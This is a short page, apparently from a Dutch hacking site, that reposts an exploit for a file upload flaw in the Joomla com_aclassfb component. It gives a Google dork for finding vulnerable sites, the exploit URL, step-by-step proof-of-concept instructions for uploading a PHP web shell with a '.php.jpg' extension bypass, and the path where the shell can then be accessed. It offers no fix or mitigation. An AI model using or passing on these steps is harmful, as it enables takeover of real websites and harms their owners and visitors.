The Dutch HackInfo

Information about Hacking, Security & Tweaking

1 1 1 1 1 1 1 1 1 1 Rating 5.00 (3 Votes)

joomla-logoEr is een kwetsbaarheid in het Aclassfb component ontdekt. 

Explot details:

  • Title : Joomla com_aclassfb File Upload Vulnerability
  • Category : Web Applications
  • Type : PHP
  • Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
  • Tested : Mozila, Chrome, Opera -> Windows & Linux
  • Vulnerabillity : File Upload
  • Dork : inurl:com_aclassfb

File Upload: http://127.0.0.1/index.php?option=com_aclassfb

Exploit : http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form

POC :

  1. Select Category
  2. After Select Category, Click “Post New Ad” http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
  3. Upload Your Shell


extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/

You have no rights to post comments


Copyright © 2019. All Rights Reserved.